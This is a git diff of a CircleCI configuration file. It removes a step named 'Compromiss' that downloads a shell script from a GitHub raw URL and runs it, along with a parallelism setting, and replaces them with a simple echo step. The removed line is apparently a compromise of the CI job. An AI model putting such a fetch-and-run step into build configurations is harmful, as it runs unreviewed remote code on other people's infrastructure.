--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -12,12 +12,11 @@ jobs:
       - image: cimg/base:stable
     # Add steps to the job
     # See: https://circleci.com/docs/2.0/configuration-reference/#steps
-    parallelism: 5
     steps:
       - checkout
       - run:
-          name: "Compromiss"
-          command: "wget https://raw.githubusercontent.com/faridmd/oshiTA/main/padang.sh && sh padang.sh"
+          name: "Say hello"
+          command: "echo Hello, World!"
 
 # Invoke jobs via workflows
 # See: https://circleci.com/docs/2.0/configuration-reference/#workflows
